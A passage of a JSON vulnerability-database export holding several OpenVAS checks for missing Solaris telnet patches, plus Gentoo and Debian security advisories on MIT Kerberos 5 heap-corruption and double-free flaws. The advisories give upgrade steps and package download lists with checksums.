value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110669-05\", package:\"SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:04", "description": "Check for the Version of telnet", "edition": 1, "published": "2009-06-03T00:00:00", "title": "Solaris Update for telnet 110668-05", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0469", "CVE-2005-0488", "CVE-2005-0468"], "modified": "2017-02-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855537", "id": "OPENVAS:855537", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for telnet 110668-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"telnet on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n telnet\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855537);\n script_version(\"$Revision: 5359 $\");\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-0488\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUNSolve\", value: \"110668-05\");\n script_name( \"Solaris Update for telnet 110668-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-110668-05-1\");\n\n script_summary(\"Check for the Version of telnet\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110668-05\", package:\"SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:20", "description": "Check for the Version of telnet", "edition": 2, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for telnet 110668-05", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0469", "CVE-2005-0488", "CVE-2005-0468"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855537", "id": "OPENVAS:1361412562310855537", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for telnet 110668-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"telnet on solaris_5.8_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n telnet\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855537\");\n script_version(\"$Revision: 9370 $\");\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-0488\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUNSolve\", value: \"110668-05\");\n script_name( \"Solaris Update for telnet 110668-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-110668-05-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of telnet\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110668-05\", package:\"SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:13:49", "description": "Check for the Version of telnet", "edition": 1, "published": "2009-06-03T00:00:00", "title": "Solaris Update for telnet 110669-05", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0469", "CVE-2005-0488", "CVE-2005-0468"], "modified": "2017-02-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855072", "id": "OPENVAS:855072", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for telnet 110669-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"telnet on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n telnet\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855072);\n script_version(\"$Revision: 5359 $\");\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-0488\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUNSolve\", value: \"110669-05\");\n script_name( \"Solaris Update for telnet 110669-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-110669-05-1\");\n\n script_summary(\"Check for the Version of telnet\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110669-05\", package:\"SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:13:46", "description": "Check for the Version of telnet", "edition": 1, "published": "2009-06-03T00:00:00", "title": "Solaris Update for telnet 119433-01", "type": "openvas", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0469", "CVE-2005-0488", "CVE-2005-0468"], "modified": "2017-02-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=855256", "id": "OPENVAS:855256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for telnet 119433-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"telnet on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n telnet\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855256);\n script_version(\"$Revision: 5359 $\");\n script_cve_id(\"CVE-2005-0468\", \"CVE-2005-0469\", \"CVE-2005-0488\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUNSolve\", value: \"119433-01\");\n script_name( \"Solaris Update for telnet 119433-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-119433-01-1\");\n\n script_summary(\"Check for the Version of telnet\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"119433-01\", package:\"SUNWtnetc\") < 0)\n{\n security_message(0);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:57", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-1175"], "description": "### Background\n\nMIT Kerberos 5 is the free implementation of the Kerberos network authentication protocol by the Massachusetts Institute of Technology. \n\n### Description\n\nDaniel Wachdorf discovered that MIT Kerberos 5 could corrupt the heap by freeing unallocated memory when receiving a special TCP request (CAN-2005-1174). He also discovered that the same request could lead to a single-byte heap overflow (CAN-2005-1175). Magnus Hagander discovered that krb5_recvauth() function of MIT Kerberos 5 might try to double-free memory (CAN-2005-1689). \n\n### Impact\n\nAlthough exploitation is considered difficult, a remote attacker could exploit the single-byte heap overflow and the double-free vulnerability to execute arbitrary code, which could lead to the compromise of the whole Kerberos realm. A remote attacker could also use the heap corruption to cause a Denial of Service. \n\n### Workaround\n\nThere are no known workarounds at this time. \n\n### Resolution\n\nAll MIT Kerberos 5 users should upgrade to the latest available version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-crypt/mit-krb5-1.4.1-r1\"", "edition": 1, "modified": "2005-07-12T00:00:00", "published": "2005-07-12T00:00:00", "id": "GLSA-200507-11", "href": "https://security.gentoo.org/glsa/200507-11", "type": "gentoo", "title": "MIT Kerberos 5: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:25", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-1175"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA 757-1 security@debian.org\nhttp://www.debian.org/security/ Michael Stone\nJuly 17, 2005 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : krb5\nVulnerability : remote code execution, denial of service\nProblem type : buffer overflow, double-free memory\nDebian-specific: no\nCVE Id : CAN-2005-1689 CAN-2005-1174 CAN-2005-1175\n\nDaniel Wachdorf reported two problems in the MIT krb5 distribution used\nfor network authentication. First, the KDC program from the krb5-kdc\npackage can corrupt the heap by trying to free memory which has already\nbeen freed on receipt of a certain TCP connection. This vulnerability\ncan cause the KDC to crash, leading to a denial of service.\n[CAN-2005-1174] Second, under certain rare circumstances this type of\nrequest can lead to a buffer overflow and remote code execution.\n[CAN-2005-1175] \n\nAdditionally, Magnus Hagander reported another problem in which the\nkrb5_recvauth function can in certain circumstances free previously\nfreed memory, potentially leading to the execution of remote code.\n[CAN-2005-1689] \n\nAll of these vulnerabilities are believed difficult to exploit, and no\nexploits have yet been discovered.\n\nFor the old stable distribution (woody), these problems have been fixed\nin version 1.2.4-5woody10. Note that woody&#x27;s KDC does not have TCP\nsupport and is not vulnerable to CAN-2005-1174.\n\nFor the stable distribution (sarge), these problems have been fixed in\nversion 1.3.6-2sarge2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.3.6-4.\n\nWe recommend that you upgrade your krb5 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian 3.0 (woody)\n- ------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody10.diff.gz\n Size/MD5 checksum: 76893 5b603215e39191c75c1f4fd2edbe8944\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4.orig.tar.gz\n Size/MD5 checksum: 5443051 663add9b5942be74a86fa860a3fa4167\n http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody10.dsc\n Size/MD5 checksum: 752 9042efb41c85203c4d86636bd9cd21c3\n\n Architecture independent packages:\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.2.4-5woody10_all.deb\n Size/MD5 checksum: 513090 327c3bbc0907bb05dd0254b1a60db870\n\n alpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 217690 cb10622be63628c1da8b4205c7b7ded2\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 253952 e4fe327ed957565da8c5f0521f5e5ba9\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 76604 9e7944be1173418bbedd95c84eb77413\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 367586 6ddf1d2523105d601d1b20b197a40037\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 207606 07d4dbd7c517f09ab7ba517f40fc9bd8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 59248 2dc334c478bea9a832051020580a136f\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 84114 157a11f95aa3ece70e9d0cd3f33f87ae\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 633616 293acf78615d48a56eb4565daac329b8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 63234 5a4f25143df406e268865bc91f94e3e5\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_alpha.deb\n Size/MD5 checksum: 252318 1b5c319da05ec2594c84db90c1519550\n\n arm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 493536 9b69be616d0026f813cb433c7848d32b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 49550 06d1dc4bcd335f710ba411a474ccd046\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 48968 2f8f3a464865e28cce0de736c1745e07\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 73774 4676dc6788200c440f168df96ba242ed\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 295360 607785186bac1dc02c4113201be09f0c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 160816 69f1cc7a1e007451015d5a8383a785bb\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 63878 7b4fea9e74a84e859f7c93df668e1035\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 198826 08140ace1bd33d9896530cac0fbc6fbc\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 166128 1cd48debec4cac63f61eb7e17dfee61a\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_arm.deb\n Size/MD5 checksum: 197470 b89b3ac644154ee046314ec9a02ce17f\n\n hppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 190118 eaad40e496e45de08c97f632d0f8dd1c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 56050 debee8549b7a835d06c6f48c893bf716\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 54216 06e06866b5753763e220be0d5989f54c\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 214822 daba4ea77dbd6c3e28fb1661b364fe6f\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 362294 56d96c29e9482a090f6e91ed9102aeb3\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 68942 d6a06fcad05ed4585b76ebe5ad18b803\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 558296 de93dd7d165861113da1210363ba2a31\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 183242 a15f258726ecbf851657efdd94092f3a\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 85290 3bff8f09dfe648558cfea40e9a67acfe\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_hppa.deb\n Size/MD5 checksum: 214280 ed9c771762353278034cd3dce8faf3c5\n\n i386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 293834 bc6017312f8efd0677844c08d5ebfe63\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 46778 e58078e1bc869aff67647e85c8678f39\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 152490 bd529465aea72043d9fd6d07fcab1a78\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 61486 2e556f0c2e59efe407a3e1fab11205cd\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 72180 ba4e48f130a61cba189bca9ab894a92b\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 434082 ae51928394a4086a4df9e891ec564423\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 46506 3321b7e3436527a742a614460ad7fc13\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 178710 5c42822842050f6018dfa9ed0caf21c1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 156736 1d4681ca3513c7ea2232df397bef255b\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_i386.deb\n Size/MD5 checksum: 179480 a46ecd57b8f1a41a57913b2cfdfd3b3a\n\n ia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 70854 e6abbe00bd26b2b31b6e8927a4fac50f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 92206 5eb6ce7ab0ece4ab97a009f8ec511064\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 256438 431f0c6855567c375e661c88946e19b0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 322478 ecf0439280e3f2542c87dfd8b303677f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 73892 4a83b247da9f035c2640413e2d6c18c5\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 107816 bebee83e6694e40ed98114323b5eb476\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 706118 b0c3afa67ed86a3888a37e27f9ce00bf\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 322554 b6ecdc74cb75ec6e7748e7947778b911\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 266762 274b89143d140df72d3b1c1d0e4f0151\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_ia64.deb\n Size/MD5 checksum: 475256 2aa7339691e1453cab946a722a075a86\n\n m68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 146354 39df67e491623128aec5f8eb687c4ca1\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 57204 4a3a3005de2f77695485ac7d8172741b\n http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 70192 e7629713226bb1765ae436a94f3b4dc8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 145044 b5f5883829c1acfa9f1bc10cea9a667f\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 44664 2dde5ea117bbd72502cdc965a9e6f1f8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 164260 ed7ef319c3e5e2a0c75994d6c8958352\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 164520 0dd2647a50725e9d6760783cd302dfb4\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 409162 171165fed1e5b36ebf4957633ecb22ef\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 277472 13081c19067f7a17f56afc3f3b955cda\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_m68k.deb\n Size/MD5 checksum: 44992 5d60536c6bb75c9ee954b07939784ad9\n\n mips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 206874 af0b07b1b1d6aa4828aa9ed304e86abd\n http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 191458 7515677f7b639a7c19c1ca1e815dabd8\n http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 175520 e843139ab24f216dd8bcacfe4804a72e\n http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 55206 c15bd9594fe03dce923f2324f7af4349\n http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 308620 fb9aca45c0332a33ee5daaceb5d765b0\n http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 66744 553f2d74cde8859cf6e0d1237347f1a8\n http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 541382 21a13a02e856d52a6e307849025d1412\n http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 209932 d6ff72cb3b1c2895ecf5b79cad38d990\n http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody10_mips.deb\n Size/MD5 checksum: 53648 237848a449f86964c8fbee33becd6cc9\n 